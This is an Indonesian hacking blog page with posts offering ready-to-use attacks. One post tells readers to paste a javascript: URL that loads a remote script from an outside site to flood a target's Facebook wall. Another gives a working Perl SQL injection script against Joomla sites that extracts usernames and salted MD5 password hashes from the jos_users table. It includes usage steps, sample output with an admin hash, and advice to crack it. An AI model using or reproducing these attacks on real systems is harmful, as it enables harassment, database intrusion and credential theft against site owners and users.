20 Januari 2011
Simple idea fakelogin facebook
Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
Facebook Wall Flooding [with JS]
Selama ini banyak tool untuk isengin FB, tapi biasanya gak tahan lama tuh toolnya. Ada Facebook Friend Adder, Facebook Freeze, dll.
Karena emang tool yg berbentuk software rawan expired, maka aku coba pake versi 'mentah' aja (javascript).
So, langsung aja ke tujuan. Script ini bertujuan untuk memungkinkan kita kirim wall sebanyak-banyaknya dalam sekali klik ke sebuah akun FB.
Pertama, buka FB target yg akan kita flood.
misalnya code::
http://www.facebook.com/nurdinhalid <=== liat ini di halaman URL adress!!
Setelah terbuka FBnya, kemudian ganti alamat url tsb di atas dengan kode javascript dibawah
code::
javascript:(a = (b = document).createElement("script")).src = "//xenonime.com/tools/wew.js", b.body.appendChild(a); void(0);
Klik ENTER dan ntar ada alert "Masukkan Jumlah Pesan Yang Akan Dikirim" isi dengan angka 20 misalnya, maka jumlah wall kamu akan terkirim sebanyak 20 kali ke FB target, kemudian klik OK.
Setelah itu ntar keluar lagi alert "Masukkan Pesan Anda". Setelah itu klik OK lagi.
Tunggu selama beberapa detik, dan coba refresh halaman profilnya.
Anda berhasil bro...
"Salam Rastafara"
Perl simple joomla SQL Injection
Ini adalah simple joomla SQL Injection yang dapat memunculkan bentuk password md5 dan md5salt serta kita bisa menentukan baris keberapa dari tabel jos_usernya...
code::
#!/usr/bin/perl -w
print "\t\t############################################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] .
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."+LIMIT+".$ARGV[1].",1--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /
print "\n[+] Username : $1";
}
if ($answer =~/
print "\n[+] password : $1\n\n";
print "\t\t# berhasil #\n\n";}
else{print "\n[-] gagal...\n";}
yang perlu dilakukan adalah menentukan banyaknya colom yang ada dan nomor yang muncul berapa
misalnya :
1. target adalah http://joomla_web.com/path/index.php?op ... ontoh&id=1
2. banyaknya colom adalah 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. nomor yang muncul adalah 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--
lalu menggunaknnnya
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
keterangan :
joomla.pl ==>nama file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==>joomla yg vuln
'0' ==>row pertama / baris pertama dari tabel jos_usernya, untuk ke dua ganti dengan '1', n seterusnya
Jika berhasil maka akan seperti ini
############################################################
# Joomla SQL Injection #
############################################################
[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A
# berhasil #
sekarang tinggal mengcrack md5 salt nya deh...
"Salam Rastafara"
Langganan:
Postingan (Atom)